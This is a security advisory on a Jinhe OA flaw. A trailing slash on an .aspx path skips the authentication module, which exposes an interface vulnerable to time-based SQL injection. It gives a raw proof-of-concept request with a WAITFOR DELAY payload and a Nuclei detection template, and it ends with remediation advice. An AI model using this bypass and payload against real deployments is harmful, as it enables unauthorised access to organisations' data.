Authentication Bypass and SQL Injection
Proof of Concept
GET /C6/JHSoft.Web.WorkFlat/RssModulesHttp.aspx/?interfaceID=1;WAITFOR%20DELAY%20'0:0:3'-- HTTP/1.1
Host: {{Hostname}}
Nuclei Template
id: jinhe-oa-auth-bypass-sqli
info:
name: Jinhe OA Authentication Bypass SQL Injection
author: security-researcher
severity: critical
description: Detects authentication bypass and time-based SQL injection vulnerability
tags: authentication-bypass,sqli,time-based,oa
http:
- raw:
- |
@timeout: 15s
GET /C6/JHSoft.Web.WorkFlat/RssModulesHttp.aspx/?interfaceID=1;WAITFOR%20DELAY%20'0:0:3'-- HTTP/1.1
Host: {{Hostname}}
matchers:
- type: dsl
dsl:
- 'status_code == 200'
- 'duration>=3'
- 'contains(body, "连接失败")'
condition: and
Vulnerability Analysis
The vulnerability consists of two main components:
- Authentication Bypass via URL Path Manipulation
- SQL Injection in Backend Interface
Routing Mechanism
Login page URL: /C6/Jhsoft.Web.login/PassWordSlideFull.aspx
The application follows a specific routing pattern:
Jhsoft.Web.logincorresponds toJhsoft.Web.login.dllPassWordSlideFull.aspxcorresponds to thePassWordSlideFullclass
Authentication Bypass Technique
Normal request to /C6/JHSoft.Web.WorkFlat/RssModulesHttp.aspx results in a 302 redirect to the login page.
However, adding a trailing slash (/) to the URL: /C6/JHSoft.Web.WorkFlat/RssModulesHttp.aspx/ bypasses authentication and allows direct access to the backend interface.
Web.config Configuration Analysis
Modules Configuration
<modules runAllManagedModulesForAllRequests="true">
<add name="JHSoft.CustomQuery" type="JHSoft.CustomQuery.HttpUploadModule, JHSoft.CustomQuery">
</add>
<add name="HttpUploadModule" type="JHWeb.qqfly.Upload.HttpUploadModule, JHWeb.qqfly.Upload">
</add>
<add name="JHSoft.Log" type="JHSoft.Log.LogHttpModule, JHSoft.Log">
</add>
</modules>
The JHSoft.Log module performs security checks including:
- SQL injection prevention
- Whitelist validation for frontend interfaces
- Session authentication for non-whitelisted endpoints
Handlers Configuration
<handlers>
<remove name="ExtensionlessUrlHandler-Integrated-4.0" />
<remove name="OPTIONSVerbHandler" />
<remove name="TRACEVerbHandler" />
<add name="AjaxMethod" verb="POST,GET" path="ajax/*.ashx" type="Ajax.PageHandlerFactory, Ajax"/>
<add name="scissors" path="scissors.axd" verb="*" type="BitmapCutter.Core.HttpHandler.BitmapScissors,BitmapCutter.Core" />
<add name="ExtensionlessUrlHandler-Integrated-4.0" path="*." verb="*" type="System.Web.Handlers.TransferRequestHandler" preCondition="integratedMode,runtimeVersionv4.0" />
</handlers>
The ExtensionlessUrlHandler with path="*." matches URLs with file extensions and can parse paths containing trailing slashes.
Bypass Mechanism
The vulnerability arises from the different URL parsing behaviors between:
JHSoft.Logmodule (checks for.aspxextension)ExtensionlessUrlHandler(handles URL routing)
When accessing backend-interface.aspx/, the JHSoft.Log module fails to recognize the .aspx extension due to the trailing slash, bypassing authentication checks. However, the ExtensionlessUrlHandler correctly routes the request to the intended endpoint.
SQL Injection Details
The RssModulesHttp.aspx interface contains a SQL injection vulnerability where user input is directly concatenated into SQL queries without proper sanitization.
Example vulnerable code structure:
string query = "SELECT * FROM data WHERE interfaceID = " + Request.QueryString["interfaceID"];
SqlCommand cmd = new SqlCommand(query, connection);
Additional SQL Injection Vector
Another SQL injection exists in the AuthOtherServerLoginUrl method. This requires proper AES encryption and database context specification for successful exploitation.
Security Recommendations
- Implement proper input validation and parameterized queries
- Remove trailing slash URL parsing discrepancies
- Enforce authentication checks consistently across all endpoints
- Use prepared statements for all database operations
- Implement proper error handling to avoid information disclosure